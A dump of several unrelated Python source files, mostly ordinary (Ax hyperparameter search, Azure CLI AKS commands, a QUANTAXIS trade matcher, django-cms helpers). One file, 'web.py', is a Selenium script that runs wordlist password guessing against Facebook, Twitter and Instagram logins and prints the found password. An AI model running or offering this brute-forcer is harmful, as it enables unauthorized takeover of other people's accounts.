"uniform or sobol."
)
self.logger.info(
"A {random_strategy} model for candidate parameter value generation"
" is created.".format(random_strategy=random_strategy)
)
self.logger.info("A RandomSearch object is successfully created.")
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""This method can be called as many times as desired with arm_count in
desired number. The total number of generated candidates will be equal
to the their multiplication. Suppose we would like to sample k
candidates where k = m x n such that k, m, n are integers. We can call
this function once with `arm_count=k`, or call it k time with
`arm_count=1` (or without that parameter at all), or call it n times
`arm_count=m` and vice versa. They all will yield k candidates, however
it is not guaranteed that the candidates will be identical across these
scenarios.
"""
model_run = self._random_strategy_model.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=model_run
)
class BayesianOptSearch(TimeSeriesParameterTuning):
"""Bayesian optimization search for hyperparameter tuning.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict],
Defines parameters by their names, their types, and their optional
values for custom parameter search space.
evaluation_function: Callable
The evaluation function to pass to Ax to evaluate arms.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
bootstrap_size: int = 5,
The number of arms that will be randomly generated to bootstrap the
Bayesian optimization.
seed: int = None,
Seed for Ax quasi-random model. If None, then time.time() is set.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
The random strategy, UNIFORM or SOBOL, used to generate the bootstrap
arms before Bayesian optimization takes over.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5']
"""
# pyre-fixme[11]: Annotation `BOTORCH` is not defined as a type.
_bayes_opt_model: Optional[Models.BOTORCH] = None
def __init__(
self,
parameters: List[Dict[str, Any]],
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
bootstrap_size: int = 5,
seed: Optional[int] = None,
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
if seed is None:
seed = int(time.time())
self.logger.info(
"No seed is given by the user, it will be set by the current time"
)
self.logger.info("Seed that is used in random search: {seed}".format(seed=seed))
if random_strategy == SearchMethodEnum.RANDOM_SEARCH_UNIFORM:
# pyre-fixme[4]: Attribute must be annotated.
self._random_strategy_model = Models.UNIFORM(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
elif random_strategy == SearchMethodEnum.RANDOM_SEARCH_SOBOL:
self._random_strategy_model = Models.SOBOL(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
else:
raise NotImplementedError(
"Invalid random strategy selection. It should be either "
"uniform or sobol."
)
self.logger.info(
"A {random_strategy} model for candidate parameter value generation"
" is created.".format(random_strategy=random_strategy)
)
bootstrap_arms_for_bayes_opt = kwargs.get("bootstrap_arms_for_bayes_opt", None)
if bootstrap_arms_for_bayes_opt is None:
model_run = self._random_strategy_model.gen(n=bootstrap_size)
else:
bootstrap_arms_list = [
Arm(name="0_" + str(i), parameters=params)
for i, params in enumerate(bootstrap_arms_for_bayes_opt)
]
model_run = GeneratorRun(bootstrap_arms_list)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=model_run
)
self.logger.info(f'fitted data columns: {self._trial_data.df["metric_name"]}')
self.logger.info(f"Bootstrapping of size = {bootstrap_size} is done.")
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""This method can be called as many times as desired with arm_count in
desired number. The total number of generated candidates will be equal
to the their multiplication. Suppose we would like to sample k
candidates where k = m x n such that k, m, n are integers. We can call
this function once with `arm_count=k`, or call it k time with
`arm_count=1` (or without that parameter at all), or call it n times
`arm_count=m` and vice versa. They all will yield k candidates, however
it is not guaranteed that the candidates will be identical across these
scenarios. We re-initiate BOTORCH model on each call.
"""
self._bayes_opt_model = Models.BOTORCH(
experiment=self._exp,
data=self._trial_data,
)
model_run = self._bayes_opt_model.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function,
# pyre-fixme[6]: Expected `DiscreteModelBridge` for 2nd param but got
# `GeneratorRun`.
generator_run=model_run,
)
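# --- Illustrative usage (a minimal sketch, not part of the library) ---
# The commented snippet below shows how the arm_count semantics described in
# the docstring above could be exercised. `my_parameters` and `my_eval_fn` are
# hypothetical placeholders, and the SearchMethodEnum member for Bayesian
# optimization is assumed rather than taken from this file.
#
#   search = SearchMethodFactory.create_search_method(
#       parameters=my_parameters,
#       selected_search_method=SearchMethodEnum.BAYES_OPT,  # assumed member name
#   )
#   # One call producing 4 candidates...
#   search.generate_evaluate_new_parameter_values(my_eval_fn, arm_count=4)
#   # ...or four calls producing 1 candidate each; both evaluate 4 arms total,
#   # though the sampled candidates need not be identical.
#   for _ in range(4):
#       search.generate_evaluate_new_parameter_values(my_eval_fn)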
class SearchForMultipleSpaces:
def __init__(
self,
parameters: Dict[str, List[Dict[str, Any]]],
search_method: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
seed: Optional[int] = None,
) -> None:
"""Search class that runs search for multiple search spaces.
Created and used for ensemble models, or model selection.
Attributes:
parameters: Dict[str, List[Dict]],
Defines a search space per model. It maps model names to search spaces
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
seed: int = None,
    Seed for Ax's quasi-random model. If None, the current time (time.time()) is used.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
    When the selected search method is random search, this selects the
    random strategy to use: UNIFORM or SOBOL.
"""
# search_agent_dict maps str -> TimeSeriesParameterTuning objects, so the
# search method object created for each model can be accessed by its key.
# pyre-fixme[4]: Attribute must be annotated.
self.search_agent_dict = {
agent_name: SearchMethodFactory.create_search_method(
parameters=model_params,
selected_search_method=search_method,
experiment_name=experiment_name,
objective_name=objective_name,
seed=seed,
)
for agent_name, model_params in parameters.items()
}
def generate_evaluate_new_parameter_values(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, selected_model: str, evaluation_function: Callable, arm_count: int = 1
) -> None:
"""Calls generate_evaluate_new_parameter_values() for the search method in
the search methods collection, search_agent_dict, called by selection_model
name.
Args:
selected_model: The name of the model that is being tuned for.
evaluation_function: The evaluation function to be used to evaluate
arms.
arm_count: Number of arms to be popuelated and evaluated.
"""
self.search_agent_dict[selected_model].generate_evaluate_new_parameter_values(
evaluation_function=evaluation_function, arm_count=arm_count
)
def list_parameter_value_scores(
self, selected_model: Optional[str] = None
) -> Union[pd.DataFrame, Dict[str, pd.DataFrame]]:
"""Calls list_parameter_value_scores() for the model that the name is given
or calls for every model otherwise.
Args:
select_model: The name of the model of which the agent's
list_parameter_value_scores() will be called, if given. If None,
then the same method is called for all model.
Returns:
A dictionary in which keys are model names, values are associated score
data frames.
"""
if selected_model:
return self.search_agent_dict[selected_model].list_parameter_value_scores()
else: # selected_model is not provided, therefore this method will
# return a dict of data frames where each key points to the
# parameter score values of the corresponding models.
return {
selected_model_: self.search_agent_dict[
selected_model_
].list_parameter_value_scores()
for selected_model_ in self.search_agent_dict
}
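# --- Illustrative usage (a minimal sketch, not part of the library) ---
# SearchForMultipleSpaces keeps one search agent per model name. The model
# names, parameter dicts, and `evaluate_prophet` below are hypothetical
# placeholders used only to show the call pattern.
#
#   searcher = SearchForMultipleSpaces(
#       parameters={
#           "prophet": [{"name": "seasonality_prior_scale", "type": "choice",
#                        "values": [0.05, 0.1, 1.0]}],
#           "arima": [{"name": "p", "type": "choice", "values": [1, 2, 3]}],
#       },
#   )
#   searcher.generate_evaluate_new_parameter_values(
#       selected_model="prophet",
#       evaluation_function=evaluate_prophet,
#       arm_count=2,
#   )
#   scores = searcher.list_parameter_value_scores()  # dict of DataFrames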
|
py
|
1a5f12fad059346bb382e2c323d37e66996bfb54
|
# -*- coding: utf-8 -*-
'''
web.py - Core module for web-based services bruteforce.
Category: Core
Description:
This module provides the methods for bruteforcing web-based services.
Most of these are built upon the Selenium library for webscraping and manipulation.
These include:
- facebook
- instagram
- twitter
Dependencies: main > selenium
Version: v1.0.0
Author: ex0dus
License: GPL-3.0 || https://opensource.org/licenses/GPL-3.0
'''
from src.main import *
# Assert: If the specified string is NOT found, that means the user has successfully logged in.
# The specified string usually means that the search query is erroneous, meaning that no
# page for the specified user exists.
class WebBruteforce(object):
def __init__(self, service, username, wordlist, delay):
self.service = service
self.username = username
self.wordlist = wordlist
self.delay = delay
print P + "[*] Checking if username exists..." + W
if self.usercheck(self.username, self.service) == 1:
print R + "[!] The username was not found! Exiting..." + W
exit()
print G + "[*] Username found! Continuing..." + W
sleep(1)
self.webBruteforce(username, wordlist, service, delay)
def usercheck(self, username, service):
driver = webdriver.Firefox()
try:
if service == "facebook":
driver.get("https://www.facebook.com/" + username)
assert (("Sorry, this page isn't available.") not in driver.page_source)
driver.close()
elif service == "twitter":
driver.get("https://www.twitter.com/" + username)
assert (("Sorry, that page doesn’t exist!") not in driver.page_source)
driver.close()
elif service == "instagram":
driver.get("https://instagram.com/" + username)
assert (("Sorry, this page isn't available.") not in driver.page_source)
driver.close()
except AssertionError:
return 1
def webBruteforce(self, username, wordlist, service, delay):
driver = webdriver.Firefox()
if service == "facebook":
driver.get("https://touch.facebook.com/login?soft=auth/")
elif service == "twitter":
driver.get("https://mobile.twitter.com/session/new")
sleep(delay * 2)
elif service == "instagram":
driver.get("https://www.instagram.com/accounts/login/?force_classic_login")
wordlist = open(wordlist, 'r')
for i in wordlist.readlines():
password = i.strip("\n")
try:
# Find username element dependent on service
if service == "facebook":
elem = driver.find_element_by_name("email")
elif service == "twitter":
elem = driver.find_element_by_name("session[username_or_email]")
elif service == "instagram":
elem = driver.find_element_by_name("username")
elem.clear()
elem.send_keys(username)
# Find password element dependent on service
if service == "facebook":
elem = driver.find_element_by_name("pass")
elif service == "twitter":
elem = driver.find_element_by_name("session[password]")
elif service == "instagram":
elem = driver.find_element_by_name("password")
elem.clear()
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
sleep(delay) # need to wait for page to load, sleep for delay seconds.
# Check for changes in driver.title
if service == "facebook":
assert (("Log into Facebook | Facebook") in driver.title)
elif service == "twitter":
assert (("Twitter") in driver.title)
elif service == "instagram":
assert (("Log in — Instagram") in driver.title)
if TIMEOUT in driver.page_source:
print O + "[!] Timeout raised! Waiting... [!]" + W
sleep(300)
print O + "[*] Username: %s | [*] Password: %s | Incorrect!\n" % (username, password) + W
sleep(delay)
except AssertionError:
# AssertionError: successful login, since we do not see the string in the title, meaning
# that the page has changed.
print G + "[*] Username: %s | [*] Password found: %s\n" % (username, password) + W
exit(0)
except Exception as e:
print R + ("Error caught! %s" % e) + W
exit(1)
|
py
|
1a5f1392439b6f975054b0c02b6e8af64ded29c3
|
# coding: utf-8
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def setup_and_run_tests(test_labels=None):
"""Discover and run project tests. Returns number of failures."""
test_labels = test_labels or ['fack.tests']
# noinspection PyStringFormat
os.environ['DJANGO_SETTINGS_MODULE'] = 'example.settings'
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner(verbosity=1)
return test_runner.run_tests(test_labels)
def runtests(test_labels=None):
"""Run project tests and exit"""
# Used as setup test_suite: must either exit or return a TestSuite
failures = setup_and_run_tests(test_labels)
sys.exit(bool(failures))
if __name__ == '__main__':
runtests(test_labels=sys.argv[1:])
|
py
|
1a5f150022a7118544d45fcd2344076f51eb8a6b
|
import argparse
from collections import deque
def word_generator(productions, init_symbol_1, init_symbol_2, input_symbol, counter):
q = deque([init_symbol_1])
st = set()
productions_list = list()
result_productions_dict = dict()
result_rules_dict = dict()
while len(q):
word = q.popleft()
if word not in st:
st.add(word)
if all(c == input_symbol for c in word):
if counter == len(word):
prime_number_word = word
result_productions_dict[prime_number_word] = ''
result_rules_dict[prime_number_word] = 'Word was applied'
productions_list.reverse()
for lp, rp, left, right in productions_list:
if rp in result_productions_dict.keys():
result_productions_dict[lp] = rp
result_rules_dict[lp] = left + ' -> ' + right
result_file = open('./prime_checker_result.txt', 'w')
for key, value in result_productions_dict.items().__reversed__():
result_file.write('Applied rule: ' + result_rules_dict[key] + '\nResult replacement: ' + key + ' -> ' + value + '\n\n')
result_file.close()
else:
result_file = open('./prime_checker_result.txt', 'w')
result_file.write(f'{counter} is not a prime number')
result_file.close()
yield word
else:
for left, right in productions:
if left in word:
new_word = word.replace(left, right)
productions_list.append((word, new_word, left, right))
if any(S in new_word for S in [init_symbol_1, init_symbol_2]):
q.append(new_word)
else:
q.appendleft(new_word)
def read_free_grammar(path):
grammar = open(path)
str_productions = [line.strip('\n') for line in grammar.readlines()]
productions = []
for line in str_productions:
line = line.split(' -> ')
productions += [tuple(line)] if len(line) > 1 else [(line[0], '')]
grammar.close()
return productions
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--grammar_path", help="Path to file with grammar",
type=str, default="./free_prime_grammar.txt")
parser.add_argument("-n", help="Number to check", type=int)
args = parser.parse_args()
productions = read_free_grammar(args.grammar_path)
gen = word_generator(productions, 'First', 'Second', 'I', args.n)
is_end = False
is_prime = False
while not is_end:
next_word = gen.__next__()
is_end = len(next_word) >= args.n
is_prime = len(next_word) == args.n
if is_prime:
print(f'{args.n} is a prime number')
else:
print(f'{args.n} is not a prime number')
if __name__ == '__main__':
main()
|
py
|
1a5f1538cb5da133f5595b8c91204c8e726a75b3
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-name-in-module,import-error
from azure.cli.core.commands import CliCommandType
from azure.cli.core.commands.arm import deployment_validate_table_format
from ._client_factory import cf_container_services
from ._client_factory import cf_managed_clusters
from ._client_factory import cf_agent_pools
from ._client_factory import cf_openshift_managed_clusters
from ._format import aks_list_table_format
from ._format import aks_show_table_format
from ._format import aks_agentpool_show_table_format
from ._format import aks_agentpool_list_table_format
from ._format import osa_list_table_format
from ._format import aks_upgrades_table_format
from ._format import aks_versions_table_format
# pylint: disable=too-many-statements
def load_command_table(self, _):
container_services_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2017_07_01.operations.'
'_container_services_operations#ContainerServicesOperations.{}',
client_factory=cf_container_services
)
managed_clusters_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2020_09_01.operations.'
'_managed_clusters_operations#ManagedClustersOperations.{}',
client_factory=cf_managed_clusters
)
agent_pools_sdk = CliCommandType(
operations_tmpl='azext_aks_preview.vendored_sdks.azure_mgmt_preview_aks.'
'operations._agent_pools_operations#AgentPoolsOperations.{}',
client_factory=cf_managed_clusters
)
openshift_managed_clusters_sdk = CliCommandType(
operations_tmpl='azure.mgmt.containerservice.v2018_09_30_preview.operations.'
'_open_shift_managed_clusters_operations#OpenShiftManagedClustersOperations.{}',
client_factory=cf_openshift_managed_clusters
)
# ACS base commands
# TODO: When the first azure-cli release after January 31, 2020 is planned, add
# `expiration=<CLI core version>` to the `self.deprecate()` args below.
deprecate_info = self.deprecate(redirect='aks', hide=True)
with self.command_group('acs', container_services_sdk, deprecate_info=deprecate_info,
client_factory=cf_container_services) as g:
g.custom_command('browse', 'acs_browse')
g.custom_command('create', 'acs_create', supports_no_wait=True,
table_transformer=deployment_validate_table_format)
g.command('delete', 'delete', confirmation=True)
g.custom_command('list', 'list_container_services')
g.custom_command('list-locations', 'list_acs_locations')
g.custom_command('scale', 'update_acs')
g.show_command('show', 'get')
g.wait_command('wait')
# ACS Mesos DC/OS commands
with self.command_group('acs dcos', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('browse', 'dcos_browse')
g.custom_command('install-cli', 'dcos_install_cli', client_factory=None)
# ACS Kubernetes commands
with self.command_group('acs kubernetes', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('browse', 'k8s_browse')
g.custom_command('get-credentials', 'k8s_get_credentials')
g.custom_command('install-cli', 'k8s_install_cli', client_factory=None)
# AKS commands
with self.command_group('aks', managed_clusters_sdk, client_factory=cf_managed_clusters) as g:
g.custom_command('browse', 'aks_browse')
g.custom_command('create', 'aks_create', supports_no_wait=True)
g.custom_command('update', 'aks_update', supports_no_wait=True)
g.command('delete', 'delete', supports_no_wait=True, confirmation=True)
g.custom_command('update-credentials', 'aks_update_credentials', supports_no_wait=True)
g.custom_command('disable-addons', 'aks_disable_addons', supports_no_wait=True)
g.custom_command('enable-addons', 'aks_enable_addons', supports_no_wait=True)
g.custom_command('get-credentials', 'aks_get_credentials')
g.custom_command('check-acr', 'aks_check_acr')
g.command('get-upgrades', 'get_upgrade_profile', table_transformer=aks_upgrades_table_format)
g.custom_command('install-cli', 'k8s_install_cli', client_factory=None)
g.custom_command('list', 'aks_list', table_transformer=aks_list_table_format)
g.custom_command('remove-dev-spaces', 'aks_remove_dev_spaces', deprecate_info=g.deprecate())
g.custom_command('scale', 'aks_scale', supports_no_wait=True)
g.custom_show_command('show', 'aks_show', table_transformer=aks_show_table_format)
g.custom_command('upgrade', 'aks_upgrade', supports_no_wait=True)
g.custom_command('use-dev-spaces', 'aks_use_dev_spaces', deprecate_info=g.deprecate())
g.custom_command('rotate-certs', 'aks_rotate_certs', supports_no_wait=True,
confirmation='Kubernetes will be unavailable during certificate rotation process.\n' +
'Are you sure you want to perform this operation?')
g.wait_command('wait')
g.command('stop', 'stop', supports_no_wait=True)
g.command('start', 'start', supports_no_wait=True)
with self.command_group('aks', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('get-versions', 'aks_get_versions', table_transformer=aks_versions_table_format)
# AKS agent pool commands
with self.command_group('aks nodepool', agent_pools_sdk, client_factory=cf_agent_pools) as g:
g.custom_command('list', 'aks_agentpool_list', table_transformer=aks_agentpool_list_table_format)
g.custom_show_command('show', 'aks_agentpool_show', table_transformer=aks_agentpool_show_table_format)
g.custom_command('add', 'aks_agentpool_add', supports_no_wait=True)
g.custom_command('scale', 'aks_agentpool_scale', supports_no_wait=True)
g.custom_command('upgrade', 'aks_agentpool_upgrade', supports_no_wait=True)
g.custom_command('update', 'aks_agentpool_update', supports_no_wait=True)
g.custom_command('delete', 'aks_agentpool_delete', supports_no_wait=True)
g.custom_command('get-upgrades', 'aks_agentpool_get_upgrade_profile')
# OSA commands
with self.command_group('openshift', openshift_managed_clusters_sdk,
client_factory=cf_openshift_managed_clusters) as g:
g.custom_command('create', 'openshift_create', supports_no_wait=True)
g.command('delete', 'delete', supports_no_wait=True, confirmation=True)
g.custom_command('scale', 'openshift_scale', supports_no_wait=True)
g.custom_show_command('show', 'openshift_show')
g.custom_command('list', 'osa_list', table_transformer=osa_list_table_format)
g.wait_command('wait')
# OSA monitor subgroup
with self.command_group('openshift monitor', openshift_managed_clusters_sdk,
client_factory=cf_openshift_managed_clusters) as g:
g.custom_command('enable', 'openshift_monitor_enable', supports_no_wait=True)
g.custom_command('disable', 'openshift_monitor_disable', supports_no_wait=True)
|
py
|
1a5f15e3ff0081d50e656ae63303aabbb38193e8
|
# coding :utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#from .market_config import stock_market,future_market,HK_stock_market,US_stock_market
from QUANTAXIS.QAUtil import QA_util_log_info, QA_util_random_with_topic
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, TRADE_STATUS
"""撮合类
输入是
self.market_data
self.order
rules
输出是
standard message
"""
class commission():
if_buyside_commission = False
if_sellside_commission = True
if_commission = if_buyside_commission and if_sellside_commission
class dealer_preset():
def __init__(self, market_type, *args, **kwargs):
self.market_type = market_type
self.if_price_limit = None  # whether daily price limits apply (US stocks / crypto are not limited)
self.if_commission = None  # whether commission is charged (some futures / some crypto charge none)
self.if_tax = None  # whether stamp tax is charged
self.if_t0 = None  # whether T+0 trading is allowed
self.if_sellopen = None  # whether short selling is allowed
self.trading_time = None  # trading hours
self.commission_coeff = None  # commission rate
self.tax_coeff = None  # tax rate
def load_preset(self):
if self.market_type is MARKET_TYPE.STOCK_CN:
self.if_price_limit = True  # daily price limits apply (US stocks / crypto are not limited)
self.if_commission = True  # commission is charged (some futures / some crypto charge none)
self.if_tax = True  # stamp tax is charged
self.if_t0 = False  # no T+0 trading (T+1 market)
self.if_sellopen = False  # short selling is not allowed
self.trading_time = [[930, 1130], [1300, 1500]]  # trading hours
self.commission_coeff = 0.00025  # commission rate
self.tax_coeff = 0.001  # tax rate
return self
elif self.market_type is MARKET_TYPE.FUTURE_CN:
self.if_price_limit = True  # daily price limits apply
self.if_commission = True  # commission is charged
self.if_tax = False  # no stamp tax
self.if_t0 = True  # T+0 trading is allowed
self.if_sellopen = True  # short selling is allowed
self.trading_time = [[930, 1130], [1300, 1500]]  # trading hours
self.commission_coeff = 0.00025  # commission rate
self.tax_coeff = 0  # tax rate
else:
pass
return self
class QA_Dealer():
"""[summary]
对于不同的市场规则:
股票市场 t+1
期货/期权/加密货币市场 t+0
股票/加密货币市场不允许卖空
期货/期权市场允许卖空
t+1的市场是
当日的买入 更新持仓- 不更新可卖数量- 资金冻结
当日的卖出 及时更新可用资金
t+0市场是:
当日买入 即时更新持仓和可卖
当日卖出 即时更新
卖空的规则是
允许无仓位的时候卖出证券(按市值和保证金比例限制算)
"""
def __init__(self, commission_fee_coeff=0.00025, tax_coeff=0.001, *args, **kwargs):
self.commission_fee_coeff = commission_fee_coeff
self.tax_coeff = tax_coeff
self.deal_name = ''
self.deal_engine = {'0x01': self.backtest_stock_dealer}
self.session = {}
self.order = None
self.market_data = None
self.commission_fee = None
self.tax = None
self.status = None
def deal(self, order, market_data):
self.order = order
self.market_data = market_data
self.deal_price = 0
self.deal_amount = 0
self.commission_fee_coeff=order.commission_coeff
self.tax_coeff=order.tax_coeff
if order.market_type is MARKET_TYPE.STOCK_CN:
return self.backtest_stock_dealer()
def callback_message(self):
# This is the standard callback message returned to the caller
message = {
'header': {
'source': 'market',
'status': self.status,
'code': self.order.code,
'session': {
'user': self.order.user,
'strategy': self.order.strategy,
'account': self.order.account_cookie
},
'order_id': self.order.order_id,
'trade_id': QA_util_random_with_topic('Trade')
},
'body': {
'order': {
'price': float("%.2f" % float(self.deal_price)),
'code': self.order.code,
'amount': self.deal_amount,
'date': self.order.date,
'datetime': self.order.datetime,
'towards': self.order.towards
},
# 'market': {
# 'open': self.market_data.get('open'),
# 'high': self.market_data.get('high'),
# 'low': self.market_data.get('low'),
# 'close': self.market_data.get('close'),
# 'volume': self.market_data.get('volume'),
# 'code': self.market_data.get('code')
# },
'fee': {
'commission': self.commission_fee,
'tax': self.tax
}
}
}
return message
def cal_fee(self):
if self.order.market_type is MARKET_TYPE.STOCK_CN:
if int(self.order.towards) > 0:
commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = 0  # no stamp tax on buys
else:
commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = self.tax_coeff * \
float(self.deal_price) * float(self.order.amount)
elif self.order.market_type is MARKET_TYPE.FUTURE_CN:
# futures are not taxed
# commission is charged on both sides, with no minimum commission
self.commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
#self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = 0  # no stamp tax
def backtest_stock_dealer(self):
# adds a __commission_fee_coeff commission rate coefficient
"""MARKET ENGINE STOCK
After receiving market data, decide whether the order can be matched and generate the trade information.
trading system
step1: check self.market_data
step2: deal
step3: return callback
"""
try:
if float(self.market_data.get('open')) == float(self.market_data.get('high')) == float(self.market_data.get('close')) == float(self.market_data.get('low')):
self.status = TRADE_STATUS.PRICE_LIMIT
self.deal_price = 0
self.deal_amount = 0
self.cal_fee()
return self.callback_message()
elif ((float(self.order.price) < float(self.market_data.get('high')) and
float(self.order.price) > float(self.market_data.get('low'))) or
float(self.order.price) == float(self.market_data.get('low')) or
float(self.order.price) == float(self.market_data.get('high'))):
'Case where the trade can be filled; slippage adjustment applies'
if float(self.order.amount) < float(self.market_data.get('volume')) * 100 / 16:
self.deal_price = self.order.price
self.deal_amount = self.order.amount
elif float(self.order.amount) >= float(self.market_data.get('volume')) * 100 / 16 and \
float(self.order.amount) < float(self.market_data.get('volume')) * 100 / 8:
"""
add some slippers
buy_price=mean(max{open,close},high)
sell_price=mean(min{open,close},low)
"""
if int(self.order.towards) > 0:
self.deal_price = (max(float(self.market_data.get('open')), float(
self.market_data.get('close'))) + float(self.market_data.get('high'))) * 0.5
else:
self.deal_price = (min(float(self.market_data.get('open')), float(
self.market_data.get('close'))) + float(self.market_data.get('low'))) * 0.5
self.deal_amount = self.order.amount
else:
self.deal_amount = float(self.market_data.get('volume')) / 8
if int(self.order.towards) > 0:
self.deal_price = float(self.market_data.get('high'))
else:
self.deal_price = float(self.market_data.get('low'))
self.cal_fee()
self.status = TRADE_STATUS.SUCCESS
return self.callback_message()
else:
self.status = TRADE_STATUS.FAILED
self.deal_price = 0
self.deal_amount = 0
self.cal_fee()
return self.callback_message()
except Exception as e:
QA_util_log_info('MARKET ENGINE ERROR: {}'.format(e))
self.status = TRADE_STATUS.NO_MARKET_DATA
return self.callback_message()
class Stock_Dealer(QA_Dealer):
def __init__(self, *args, **kwargs):
super().__init__()
if __name__ == '__main__':
pass
|
py
|
1a5f1790a76f2aae3222cafb9aff25c13fd50275
|
# -*- coding: utf-8 -*-
# TODO: this is just stuff from utils.py - should be splitted / moved
from cms.utils.i18n import get_default_language
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
import urllib
def get_template_from_request(request, obj=None, no_current_page=False):
"""
Gets a valid template from different sources or falls back to the default
template.
"""
template = None
if len(settings.CMS_TEMPLATES) == 1:
return settings.CMS_TEMPLATES[0][0]
if "template" in request.REQUEST:
template = request.REQUEST['template']
if not template and obj is not None:
template = obj.get_template()
if not template and not no_current_page and hasattr(request, "current_page"):
current_page = request.current_page
if hasattr(current_page, "get_template"):
template = current_page.get_template()
if template is not None and template in dict(settings.CMS_TEMPLATES).keys():
if template == settings.CMS_TEMPLATE_INHERITANCE_MAGIC and obj:
# Happens on admin's request when changing the template for a page
# to "inherit".
return obj.get_template()
return template
return settings.CMS_TEMPLATES[0][0]
def get_language_from_request(request, current_page=None):
from cms.models import Page
"""
Return the most obvious language according the request
"""
language = request.REQUEST.get('language', None)
if language:
if not language in dict(settings.CMS_LANGUAGES).keys():
language = None
if language is None:
language = getattr(request, 'LANGUAGE_CODE', None)
if language:
if not language in dict(settings.CMS_LANGUAGES).keys():
language = None
# TODO: This smells like a refactoring oversight - was current_page ever a page object? It appears to be a string now
if language is None and isinstance(current_page, Page):
# in last resort, get the first language available in the page
languages = current_page.get_languages()
if len(languages) > 0:
language = languages[0]
if language is None:
# language must be defined in CMS_LANGUAGES, so check first if there
# is any language with LANGUAGE_CODE, otherwise try to split it and find
# best match
language = get_default_language()
return language
def get_page_from_request(request):
from warnings import warn
from cms.utils.page_resolver import get_page_from_request as new
warn("'cms.utils.get_page_from_request' is deprecated in favor of "
"'cms.utils.page_resolver.get_page_from_request' and will be removed "
"in Django-CMS 2.2.", DeprecationWarning)
return new(request)
|
py
|
1a5f190921b60820614639cd727170d94fc49298
|
from instrument import Instrument
from visa import VisaIOError
import visa
import types
import logging
import numpy as np
import qt
class FSV_Exception(Exception):
pass
class RhodeSchwartz_FSV(Instrument):
'''
This is the driver for the Rohde & Schwarz FSV Signal Analyzer.
Usage:
Initialize with
<name> = qt.instruments.create('<name>', 'RhodeSchwartz_FSV',
address='TCPIP::<IP-address>::INSTR',
reset=<bool>,)
For GPIB the address is: 'GPIB<interface_nunmber>::<gpib-address>'
'''
def __init__(self, name, address, reset=False):
# Initialize wrapper functions
logging.info('Initializing instrument Rhode & Schwarz FSV Signal Generator')
Instrument.__init__(self, name, tags=['physical'])
# Add some global constants
self._address = address
self._default_timeout = 2000 # ms
self._visainstrument = visa.ResourceManager().open_resource(self._address,
timeout=self._default_timeout)
self._freq_unit = 1
